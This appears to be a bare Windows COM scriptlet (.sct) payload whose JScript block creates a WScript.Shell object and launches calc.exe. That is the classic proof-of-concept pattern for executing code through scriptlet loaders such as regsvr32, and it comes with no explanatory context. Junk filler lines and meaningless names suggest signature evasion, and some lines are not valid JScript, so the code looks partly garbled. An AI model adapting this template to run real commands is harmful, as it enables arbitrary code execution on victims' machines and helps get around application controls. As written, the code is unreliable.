<?XML version="1.0"?>
<scriptlet><registration description="boo" progid="yaa" version="2.01" classid="{33453267-6633-8855-3478-6633FEEEECDC}" remotable="true"
	>
</registration>
# AAAAAAAAAAAAAAAAAAAA
<script language="JScript">
<![CDATA[
	var rrr = "AAA"
	var aa = rr

#VASSSSSSSSSSSSSSSS
$ws = "Wscript.shell"

$cal = "calc.exe"
	var rrrrrrrrr = new ActiveXObject($ws).Run($cal);
	
	
]]>
</script>

</scriptlet>
